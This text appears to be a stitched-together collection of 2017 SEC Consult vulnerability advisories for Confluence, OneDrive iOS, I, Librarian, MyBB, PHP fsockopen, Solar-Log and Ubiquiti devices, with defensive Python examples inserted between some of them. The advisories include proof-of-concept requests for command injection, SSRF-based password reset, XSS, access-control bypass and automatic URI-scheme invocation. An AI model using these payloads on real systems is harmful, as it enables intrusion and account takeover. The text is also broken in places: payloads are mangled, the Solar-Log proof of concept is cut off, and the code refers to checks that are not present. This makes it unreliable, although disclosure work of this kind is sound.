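    return recover_plaintext(lambda iv, c: padding_oracle(KEY, iv, c), IV, ct)
```

The only inputs `recover_plaintext` uses are the IV, the ciphertext and the oracle's yes/no answer; the key never appears on the attacker's side. The defence is the one the W3C note points to: an AEAD mode such as AES-GCM, or at least a MAC over the ciphertext that is verified before any decryption or padding check, plus a single uniform error for every decryption failure.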
SEC Consult SA-20170613-0 :: Access Restriction Bypass in Atlassian Confluence
SEC Consult Vulnerability Lab Security Advisory < 20170613-0 >
===
title: Access Restriction Bypass
product: Atlassian Confluence
vulnerable version: 4.3.0 - 6.1.1
fixed version: 6.2.1
CVE number: -
impact: Medium
homepage: https://www.atlassian.com/
found: 2017-03-27
by: Mathias Frank (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"In 2002, our founders, Scott Farquhar and Mike Cannon-Brookes, set conventional wisdom on its ear by launching a successful enterprise software company with no sales force. From Australia. Our first product, JIRA, proved that if you make a great piece of software, price it right, and make it available to anyone to download from the internet, teams will come. And they'll build great things with it. And they'll tell two friends, and so on, and so on. Today a lot has changed. We're over 1,700 Atlassians (and growing), in six locations, with products to help all types of teams realize their visions and get stuff done. But the fundamentals remain the same. We're for teams because we believe that great teams can do amazing things. We're not afraid to do things differently. And we're driven by an inspiring set of values that shape our culture and our products for the better."
Source: https://www.atlassian.com/company
Business recommendation:
SEC Consult recommends upgrading to the latest version available, which fixes the identified issue.
Vulnerability overview/description:
---
1) Access Restriction Bypass
The "watch" functionality gives a user the option to subscribe to specific content. The user then gets a notification for any new comment made on the subscribed content. A user can manually subscribe to pages which he is not able to view, and he then receives any further comment made on the restricted page.
Proof of concept:
-
1) Access Restriction Bypass
Prerequisite as admin user, just for a proof of concept demo page:
* Create a Space "Demo Space" visible for every user and group
* Create a Page "Demo Page" (example pageID: 1048582) and restrict the "Viewing and editing restriction" to only the administrator group/user with the "/pages/getcontentpermissions.action" function.
Send the following request as a normal user:
--
POST /users/addpagenotificationajax.action HTTP/1.1
Host: localhost:8090
Referer: http://localhost:8090/display/ds/Welcome+to+Confluence
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]
pageId=1048582_token=1b5ee6615c44e4067679ccfa6e5904f0e42e8eb7
--
The user is then subscribed to the "Demo Page", receives a notification, and continues to receive any further comments made on the subscribed page. The endpoint only checks that the page ID exists, not that the requesting user is allowed to view the page.
Vulnerable / tested versions:
-
The following versions have been tested by SEC Consult:
Atlassian Confluence version 5.9.14 and 6.1.1
Atlassian believes that versions from 4.3.0 before 6.2.1 are affected.
Vendor contact timeline:
2017-04-03: Contacting vendor through secur...@atlassian.com
2017-04-05: Vendor confirmed the vulnerability and issued the references CONFSERVER-52241 (Confluence Server) and CONFCLOUD-54634 (Confluence Cloud)
2017-04-13: Vendor fixed the issue CONFCLOUD-54634.
2017-05-11: Asked for planned timeline and release of a fix for CONFSERVER-52241.
2017-05-29: Vendor released a fix for CONFSERVER-52241 with version 6.2.1.
2017-06-08: Vendor prepares a sanitised copy of CONFSERVER-52241 for release along with the advisory - https://jira.atlassian.com/browse/CONFSERVER-52560
2017-06-13: Public release of advisory.
Solution:
-
Upgrade to version 6.2.1 available at:
https://www.atlassian.com/software/confluence/download
The effectiveness of the fix was verified by the SEC Consult Vulnerability Lab.
https://jira.atlassian.com/browse/CONFSERVER-52560 Workaround: --- Disable workbox notifications as per the instructions found at https://confluence.atlassian.com/doc/configuring-workbox-notifications-301663830.html Advisory URL: -
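The missing check behind the Confluence issue above is an authorization test that a "watch" endpoint has to make twice: once when the subscription is created, and again when a notification is actually delivered, because a page can become restricted after a user has legitimately watched it. The following is an added example written for this advisory, not Confluence code; Page, WatchService, add_watch and add_comment are hypothetical stand-ins for the page-notification endpoint and the comment notifier, and the page IDs and user names are constructed.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Page:
    page_id: int
    title: str
    # Empty set: visible to everyone. Otherwise only the listed users may view.
    view_restricted_to: frozenset = frozenset()

    def can_view(self, user: str) -> bool:
        return not self.view_restricted_to or user in self.view_restricted_to


@dataclass
class WatchService:
    """Hypothetical stand-in for the page-notification endpoint and the
    comment notifier; not Confluence code."""
    pages: dict                                   # page_id -> Page
    watchers: dict = field(default_factory=dict)  # page_id -> set of users
    inbox: dict = field(default_factory=dict)     # user -> list of notifications

    def add_watch(self, user: str, page_id: int) -> bool:
        """Equivalent of addpagenotificationajax.action with the missing check:
        a watch is only created if the caller may view the page."""
        page = self.pages.get(page_id)
        if page is None or not page.can_view(user):
            # One answer for "no such page" and "not allowed", so the endpoint
            # cannot be used to confirm which restricted page IDs exist.
            return False
        self.watchers.setdefault(page_id, set()).add(user)
        return True

    def add_comment(self, author: str, page_id: int, text: str) -> list:
        """Notify only watchers who can still view the page. Re-checking here
        covers restrictions added after the watch was created, which a check
        at subscription time alone would miss."""
        page = self.pages[page_id]
        delivered = []
        for user in sorted(self.watchers.get(page_id, ())):
            if page.can_view(user):
                self.inbox.setdefault(user, []).append((page.title, author, text))
                delivered.append(user)
        return delivered
```

The delivery-time check is the one that matters for defence in depth: even if a subscription slipped through (a bug, an import of old data, a restriction applied later), nothing about the restricted page reaches a user who cannot open it.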
SEC Consult SA-20170510-0 :: Insecure Handling Of URI Schemes in Microsoft OneDrive iOS App
A short demo video is available here: https://youtu.be/0jZdM9peVSk

SEC Consult Vulnerability Lab Security Advisory < 20170510-0 >
=======================================================================
              title: Insecure Handling Of URI Schemes
            product: Microsoft OneDrive iOS App
 vulnerable version: 8.13
      fixed version: 8.14
             impact: Medium
           homepage: https://onedrive.live.com/
              found: 2017-04-10
                 by: S. Tripathy (Office Singapore)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Do more wherever you go with Microsoft OneDrive. Get to and share your
documents, photos, and other files from your iOS device, computer (PC or
Mac), and any other devices you use. Use the Office mobile apps to stay
productive and work together, no matter where you are. The OneDrive app for
iOS lets you easily work with your personal and work files when you're on
the go."

Source: https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8

Business recommendation:
------------------------
SEC Consult recommends to implement proper validation of URI schemes and to
always ask for user permission before calling an external URI scheme.

Vulnerability overview/description:
-----------------------------------
1) Insecure Handling of URI Schemes
Due to the lack of URI scheme validation, any external URI scheme can be
invoked by the Microsoft OneDrive iOS application without any user
interaction.

Proof of concept:
-----------------
1) Insecure Handling of URI Schemes
An attacker can upload and share a malicious HTML file that invokes an
external URI scheme. As soon as the file is opened by any OneDrive user on an
iOS device, the external URI scheme is invoked automatically.

Example of a malicious HTML file:

  click
  var t = document.getElementById("callme");
  var fe = document.createEvent("MouseEvents");
  fe.initEvent("click", true, true);
  t.dispatchEvent(fe);

Vulnerable / tested versions:
-----------------------------
The following version is affected by the identified vulnerability, which was
the most recent version at the time of discovery:
Microsoft OneDrive iOS application v8.13

Vendor contact timeline:
------------------------
2017-04-11: Contacting vendor through sec...@microsoft.com
2017-04-12: Vendor confirmed the vulnerability.
2017-04-21: Vendor released the updated version.
2017-05-10: Public release of advisory.

Solution:
---------
SEC Consult recommends to implement proper validation of URI schemes and to
always ask for user permission before calling a URI scheme.

Update to OneDrive v8.14
https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the
evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about
vulnerabilities and valid recommendation about the risk profile of new
technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Siddhartha Tripathy / @2017
SEC Consult SA-20170509-0 :: Multiple vulnerabilities in I, Librarian PDF manager
SEC Consult Vulnerability Lab Security Advisory < 20170509-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: I, Librarian PDF manager
 vulnerable version: <=4.6 & 4.7
      fixed version: 4.8
         CVE number: -
             impact: Critical
           homepage: https://i-librarian.net/
              found: 2017-01-30
                 by: Wan Ikram (Office Kuala Lumpur)
                     Fikri Fadzil (Office Kuala Lumpur)
                     Jasveer Singh (Office Kuala Lumpur)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"I, Librarian is a PDF manager or PDF organizer, which enables researchers,
scholars, or students to create an annotated collection of PDF articles. If
used as a groupware, users may build their virtual library collaboratively,
sharing the workload of literature mining. I, Librarian will make your work
with scientific literature incredibly efficient."

Source: https://i-librarian.net/

Business recommendation:
------------------------
By combining the vulnerabilities documented in this advisory an attacker can
fully compromise the web server on which the "I, Librarian" software is
installed. SEC Consult recommends to install the latest version available
immediately and to perform a thorough security review of this software.

Vulnerability overview/description:
-----------------------------------
The application does not apply proper validation to several user inputs. As
a result, the vulnerabilities below can be exploited by authenticated
attackers of any role to fully compromise the system.

1. OS Command Injection
Arbitrary OS commands can be executed via "batchimport.php". This is a
serious vulnerability, as the chance of the web server being fully
compromised is very high.

2. Server-Side Request Forgery
This vulnerability allows an attacker to send HTTP requests originating from
the web server. As some functions in the web application require requests to
originate from localhost, the risk of this vulnerability is considered high.

3. Directory Enumeration
It is possible to enumerate all directories below any directory on the
server through "jqueryFileTree.php".

4. Reflected Cross Site Scripting
This vulnerability was found in "temp.php". It allows an attacker to inject
malicious client-side script, which is executed in the browser of users who
visit the manipulated site.

Proof of concept:
-----------------
1. OS Command Injection
Below are the details of the HTTP request that needs to be sent to execute
arbitrary OS commands through "batchimport.php":

URL     : http://$DOMAIN/batchimport.php
METHOD  : GET
PAYLOAD : directory=.==""

2. Server-Side Request Forgery
Below is an example of exploiting this vulnerability. An attacker can reset
any user's password, which by design requires the request to be sent from
localhost.

URL     : http://$DOMAIN/ajaxsupplement.php
METHOD  : POST
PAYLOAD : form_new_file_link=http://$DOMAIN/resetpassword.php?username=_password1=_password2=

3. Directory Enumeration
Available directories can be enumerated simply by navigating through the
"dir" parameter of "jqueryFileTree.php".

URL     : http://$DOMAIN/jqueryFileTree.php
METHOD  : POST
PAYLOAD : dir=

4. Reflected Cross Site Scripting
The following payload shows a simple alert message box:

URL     : http://$DOMAIN/temp.php
METHOD  : GET
PAYLOAD : tempfile=alert(42)

Vulnerable / tested versions:
-----------------------------
"I, Librarian" version 4.6 has been tested. This version was the latest at
the time the security vulnerabilities were discovered. It is assumed that
previous versions are affected as well.

Vendor contact timeline:
------------------------
2017-01-31: Contacting vendor through supp...@i-librarian.net
2017-01-31: Vendor replied with their PGP public key.
2017-02-03: Provided encrypted advisory and proof of concept to the vendor.
2017-02-09: Patch released, version 4.7.
2017-02-21: Informed vendor about some issues which were not addressed
            correctly.
2017-03-30: Patch released by the vendor - I, Librarian version 4.8.
2017-05-09: Public release of advisory

Solution:
---------
Upgrade to I, Librarian 4.8
For further information see: https://i-librarian.net/article.php?id=9

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
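Items 1 and 3 of the I, Librarian advisory share one root cause: a user-supplied directory name reaches the filesystem, and in the batch-import case a shell, unchecked. The added example below is not I, Librarian code; confine, list_tree and import_pdfs are hypothetical stand-ins for the "dir" and "directory" handlers, the sample library is constructed in a temporary directory, and `ls` merely stands in for whatever external importer the real script would call. It shows the two controls a fix needs: resolve the path and refuse anything outside the library root, and pass the path to a subprocess as one argv element rather than through a shell.

```python
import subprocess
import tempfile
from pathlib import Path


def confine(base: Path, user_dir: str) -> Path:
    """Resolve user_dir relative to base and refuse anything outside it.
    Absolute paths, '..' segments and symlinks are all collapsed by resolve(),
    so the containment test is made on the real location."""
    root = base.resolve()
    target = (root / user_dir).resolve()
    try:
        target.relative_to(root)
    except ValueError:
        raise PermissionError(f"{user_dir!r} escapes the library root") from None
    if not target.is_dir():
        raise FileNotFoundError(user_dir)
    return target


def list_tree(base: Path, user_dir: str) -> list:
    """Confined replacement for a jqueryFileTree-style 'dir' handler: only
    directories below the library root can be listed."""
    target = confine(base, user_dir)
    return sorted(p.name + ("/" if p.is_dir() else "") for p in target.iterdir())


def import_pdfs(base: Path, user_dir: str) -> list:
    """Confined replacement for a batch-import 'directory' handler. The path is
    one argv element of the external tool ('ls' stands in for the importer),
    never part of a shell command line, so metacharacters in it are inert."""
    target = confine(base, user_dir)
    proc = subprocess.run(["ls", "-1", "--", str(target)],
                          capture_output=True, text=True, check=True)
    return sorted(n for n in proc.stdout.splitlines() if n.lower().endswith(".pdf"))


def rejected(base: Path, user_dir: str) -> bool:
    """True if confine() refuses user_dir (used by the self-check below)."""
    try:
        confine(base, user_dir)
    except (PermissionError, FileNotFoundError):
        return True
    return False


def demo_library() -> Path:
    """Constructed sample library: two folders, one with a hostile name that
    would be interpreted as two commands if it ever reached a shell."""
    base = Path(tempfile.mkdtemp(prefix="ilib-"))
    (base / "papers").mkdir()
    (base / "papers" / "a.pdf").write_bytes(b"%PDF-1.4 constructed\n")
    (base / "papers" / "notes.txt").write_text("constructed\n")
    hostile = base / "x; echo pwned"
    hostile.mkdir()
    (hostile / "b.pdf").write_bytes(b"%PDF-1.4 constructed\n")
    return base
```

Note that the containment check is done on the resolved path, not on the string: filtering `..` out of the input is not enough, because a symlink inside the library can still point outside it.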
SEC Consult SA-20170407-0 :: Server-Side Request Forgery in MyBB forum
SEC Consult Vulnerability Lab Security Advisory < 20170407-0 >
=======================================================================
              title: Server Side Request Forgery (SSRF) Vulnerability
            product: MyBB
 vulnerable version: 1.8.10
      fixed version: 1.8.11
         CVE number: CVE-2017-7566
             impact: Medium
           homepage: https://mybb.com/
              found: 2017-03-03
                 by: Wan Ikram (Office Kuala Lumpur)
                     Fikri Fadzil (Office Kuala Lumpur)
                     Jasveer Singh (Office Kuala Lumpur)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"With everything from forums to threads, posts to private messages, search
to profiles, and reputation to warnings, MyBB features everything you need
to run an efficient and captivating community. Through plugins and themes,
you can extend MyBB's functionality to build your community exactly as you'd
like it."

Source: https://mybb.com/

Business recommendation:
------------------------
The patch should be installed immediately if cURL functions are disabled.
Furthermore, SEC Consult recommends to perform a thorough security review of
this software.

Vulnerability overview/description:
-----------------------------------
1. Server-Side Request Forgery
An attacker is able to initiate socket connections to arbitrary systems from
the internal network interface of the server via the web application's
"Change Avatar" function. This vulnerability can be used to identify internal
hosts and perform internal port scanning.

Proof of concept:
-----------------
1. Server-Side Request Forgery
This vulnerability can be exploited by an attacker with a registered account;
an ordinary (lowest-privileged) account is sufficient. If the server hosting
the web application disallows cURL functions, the application falls back to
the "fsockopen" function. Below is an example of how the SSRF issue can be
exploited.

URL     : http://$DOMAIN/usercp.php
METHOD  : POST
PAYLOAD : avatarurl=http://$IP:$PORT:80

Vulnerable / tested versions:
-----------------------------
MyBB version 1.8.10 has been tested. This version was the latest version at
the time the security vulnerability was discovered.

Vendor contact timeline:
------------------------
2017-03-09: Contacting vendor through the "Private Inquiries" forum at
            https://community.mybb.com/forum-135.html
2017-03-09: Advisory sent through the "Private Inquiries". Vendor has
            confirmed the issues. No specific date for the fix was given.
2017-03-17: Vendor confirmed the vulnerability; working on the fix.
2017-03-31: Requesting a status update.
2017-04-04: Patch released by the vendor.
2017-04-07: Public release of advisory.

Solution:
---------
Upgrade to MyBB 1.8.11
For further information see:
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

EOF Fikri Fadzil / @2017
SEC Consult SA-20170403-0 :: Misbehavior of PHP fsockopen function
SEC Consult Vulnerability Lab Security Advisory < 20170403-0 >
=======================================================================
              title: Misbehavior of the "fsockopen" function
            product: PHP
 vulnerable version: 7.1.2
      fixed version:
         CVE number: CVE-2017-7272
             impact: Medium
           homepage: http://www.php.net/
              found: 2017-03-06
                 by: Fikri Fadzil (Office Kuala Lumpur)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"PHP is a popular general-purpose scripting language that is especially
suited to web development. Fast, flexible and pragmatic, PHP powers
everything from your blog to the most popular websites in the world."

Source: http://www.php.net/

Business recommendation:
------------------------
By making use of this issue, an attacker can bypass prevention mechanisms
that are meant to protect calls to the "fsockopen" function in PHP, and so
perform server-side request forgery attacks. SEC Consult recommends to check
developed or installed websites for any possibility of exploiting this issue.

Vulnerability overview/description:
-----------------------------------
The "fsockopen" function in PHP behaves differently if two port numbers are
given at once. As many developers assume the function gives priority to the
port number passed as the second parameter, an attacker may use this
unexpected behavior to e.g. conduct a server-side request forgery attack.

Proof of concept:
-----------------
The "fsockopen" function in PHP will not use the port number given as the
second parameter if the hostname already has a port number appended. The
example below illustrates the misbehavior.

  <?php
  // This request will go to port 80
  fsockopen("192.168.184.132", 80);

  // This request will go to port 53
  fsockopen("192.168.184.132:53", 80);

Instead of initiating a socket connection on port 80 as given in the second
parameter, the function uses port 53, which is appended to the hostname.

Vulnerable / tested versions:
-----------------------------
PHP versions 7.0.11 and 7.1.2 have been tested and found to be vulnerable.
Older PHP versions are potentially affected as well.

Vendor contact timeline:
------------------------
2017-03-07: Reported the issue through the PHP Bug Tracking System
            (SecBug #74216) https://bugs.php.net/bug.php?id=74216
2017-03-07: Changes were committed to PHP's main repository on GitHub.
            https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a
2017-04-03: Public disclosure of the advisory

Solution:
---------
Patch:
https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a

Workaround:
-----------
It is recommended to restrict user-supplied hostnames so that no port number
can be appended.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

EOF Fikri Fadzil / @2017
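The MyBB SSRF and the PHP fsockopen advisory above describe the same trap from two sides: a "host" taken from user input still carries its own ":port", and the port the application passes explicitly is silently overridden. The workaround stated in the PHP advisory is to reject such hostnames before they reach the socket call. The following validator is an added example, not code from PHP or MyBB; safe_host and outbound_target are hypothetical names, and the sample addresses in the check are constructed. It rejects any host that contains a colon, pins the port to the scheme default instead of trusting the URL, and refuses literal addresses that are not globally routable, which covers the internal-host-scanning use the MyBB advisory warns about.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, 253 chars in total.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$)(?:{_LABEL}\.)*{_LABEL}$", re.IGNORECASE)

# The only port the application intends to use per scheme; never taken from input.
DEFAULT_PORT = {"http": 80, "https": 443}


def safe_host(host: str) -> str:
    """Return host unchanged if it is a bare hostname or a public IPv4 literal;
    raise ValueError otherwise. A ':' is rejected outright, which is the
    advisory's workaround: 'host:port' must never reach fsockopen($host, $port)."""
    if not host or ":" in host:
        raise ValueError("host must not carry a port (or be an IPv6 literal)")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        if not HOSTNAME_RE.fullmatch(host):
            raise ValueError("not a valid hostname") from None
        return host
    # Literal address: keep the fetcher off loopback, RFC 1918, link-local, ...
    if not addr.is_global:
        raise ValueError("address is not globally routable")
    return host


def outbound_target(url: str) -> tuple:
    """Validate a user-supplied http(s) URL (e.g. an avatar URL) and return the
    (host, port) pair the application may connect to. The port returned is the
    scheme default, never one smuggled into the host part of the URL."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORT:
        raise ValueError("only http and https are allowed")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo is not allowed")
    try:
        port = parts.port          # raises ValueError on 'host:8080:80'
    except ValueError:
        raise ValueError("malformed port") from None
    expected = DEFAULT_PORT[parts.scheme]
    if port not in (None, expected):
        raise ValueError(f"port {port} not allowed; expected {expected}")
    return safe_host(parts.hostname or ""), expected


def rejected(fn, value) -> bool:
    """True if fn(value) raises ValueError (used by the self-check below)."""
    try:
        fn(value)
    except ValueError:
        return True
    return False
```

The literal-address check only covers what is in the string; a hostname that resolves to an internal address at connect time is a separate problem (DNS rebinding) and needs the resolved address checked again at the socket layer.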
SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices
SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Solare Datensysteme GmbH Solar-Log
                     250/300/500/800e/1000/1000 PM+/1200/2000
 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
      fixed version: Firmware 3.5.3-86
         CVE number: -
             impact: Critical
           homepage: http://www.solar-log.com/de/home.html
              found: 2017-01-23
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring
systems for photovoltaic plants. The company was founded in 2007 by Thomas
Preuhs and Jörg Karwath and was created from the company "TOP Solare
Datensysteme". This company had been developing and selling the "SolarLog™"
product range since 2005. Our core competence covers innovative products
with short development cycles and an excellent cost/performance ratio. Our
developments have the outstanding characteristics of high customer value,
simple operation and universal application without requiring time-consuming
installation of software."

Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html

Business recommendation:
------------------------
SEC Consult recommends to immediately install the available firmware update
and to restrict network access. Furthermore, this device should not be used
in production until a thorough security review has been performed by
security professionals and all identified issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.
An attacker can download the configuration file without authentication and
extract the password used to log in to the Solar-Log. Therefore, an attacker
can gain administrative access to such a device without prior
authentication.

2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.
A CSRF vulnerability enables an attacker to remove/modify the password of a
device by luring an authenticated user into clicking a crafted link. An
attacker is able to take over the device by exploiting this vulnerability.

3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.
Arbitrary files can be uploaded to the Solar-Log with a crafted POST request.
An attacker can host a malicious website on it or use the Solar-Log as a
share to store any (illegal) content.

4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions (2.8.4-56 / 3.5.2-85)
are prone to this information disclosure vulnerability.
The network configuration of the internal network, including the gateway and
the MAC address of the device, is leaked. All details of the IPC@CHIP from
Beck IPC (https://www.beck-ipc.com/), such as the RTOS version and serial
number, are leaked as well.

5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions (2.8.4-56 / 3.5.2-85)
are prone to this vulnerability.
Since the Solar-Log is based on Beck IPC chips, a UDP configuration server is
enabled by default. This server allows the IP configuration to be changed
over a specific UDP port. This functionality can be protected with a
password, but none is set in the affected firmware versions. The MAC address,
which is leaked by 4), is needed to configure the device. An attacker can
reconfigure the device without any authentication.

6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions (2.8.4-56 / 3.5.2-85)
are prone to this vulnerability.
The Beck IPC UDP configuration server on the Solar-Log device can be attacked
with arbitrary UDP packets to permanently disable the Solar-Log until a
manual reboot is triggered.

7) Potential Unauthenticated Reprogramming of IPC@CHIP Flash Memory
Potentially present in all Solar-Log devices in the current firmware versions
(2.8.4-56 / 3.5.2-85).
Since the "CHIPTOOL" from Beck IPC enables a developer to reprogram the chip
over the network via UDP, the missing password can also enable an attacker to
do this on a Solar-Log device. This can lead to a simple Denial of Service or
to a botnet of Solar-Log devices!

Proof of concept:
-----------------
SEC Consult SA-20170316-0 :: Authenticated command injection in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170316-0 >
=======================================================================
              title: Authenticated Command Injection
            product: Multiple Ubiquiti Networks products, e.g.
                     TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
                     AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
                     AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
                     BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
                     locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
                     NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
                     NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
                     Power AP N
 vulnerable version: v1.3.3 (SW), v5.6.9/v6.0 (XM)
      fixed version: -
         CVE number: -
             impact: Critical
           homepage: https://www.ubnt.com
              found: 2016-11-22
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking technology for
service providers and enterprises. Our technology platforms focus on
delivering highly advanced and easily deployable solutions that appeal to a
global customer base in underserved and underpenetrated markets."

Source: http://ir.ubnt.com/

Business recommendation:
------------------------
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) Command Injection in Admin Interface
A command injection vulnerability was found in "pingtest_action.cgi". The
script is vulnerable because the value of a variable can be injected. One
reason for this behaviour is the PHP version in use (PHP/FI 2.0.1 from
1997). The vulnerability can be exploited by luring an authenticated user
into clicking a crafted link or simply visiting a malicious website. The
whole attack can be performed via a single GET request and is very simple
since there is no CSRF protection. See our other advisory published in
January 2017:
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170130-0_Ubiquiti_Networks_XSS_CSRF_v10.txt

An attacker can open a port binding or reverse shell to connect to the device
and is also able to change the "passwd", since the web service runs with
root privileges! Furthermore, low privileged read-only users, which can be
created in the web interface, are also able to perform this attack. If the
Ubiquiti device acts as router or even as firewall, the attacker can take
over the whole network by exploiting this vulnerability.

Proof of concept:
-----------------
1) Command Injection in Admin Interface
The following link can be used to open a reverse shell to the attacker's IP
address. There are two variants for the different firmware versions.

Reverse root shell - firmware: v1.3.3 (SW)
[ PoC removed - no patch available ]

Reverse root shell - firmware: v5.6.9/v6.0 (XM)
[ PoC removed - no patch available ]

A video is available here: https://youtu.be/oU8GNeP_Aps

Vulnerable / tested versions:
-----------------------------
The following devices and firmware versions have been tested/verified:
TS-8-PRO                   - v1.3.3 (SW)
(Rocket) M5                - v5.6.9/v6.0 (XM)
(PicoStationM2HP) PICOM2HP - v5.6.9/v6.0 (XM)
(NanoStationM5) NSM5       - v5.6.9/v6.0 (XM)

Based on information embedded in the firmware of other Ubiquiti products,
gathered with our IoT Inspector tool, we believe the following devices are
affected as well:
Ubiquiti Networks AF24 (Version: AF24 v3.2)
Ubiquiti Networks AF24HD (Version: AF24 v3.2)
Ubiquiti Networks AF-2X (Version: AF2X v3.2)
Ubiquiti Networks AF-3X (Version: AF3X v3.2)
Ubiquiti Networks AF5 (Version: AF5 v3.2)
Ubiquiti Networks AF5U (Version: AF5 v3.2)
Ubiquiti Networks AF-5X (Version: AF5X v3.2.1)
Ubiquiti Networks AG-PRO-INS (Version: AirGWP v1.1.7)
Ubiquiti Networks airGateway (Version: AirGW v1.1.7)
Ubiquiti Networks airGateway-LR (Version: AirGW v1.1.7)
Ubiquiti Networks AMG-PRO (Version: AirGWP v1.1.7)
Ubiquiti Networks LBE-5AC-16-120 (Version: WA v7.2.4)
Ubiquiti Networks LBE-5AC-23 (Version: WA v7.2.4)
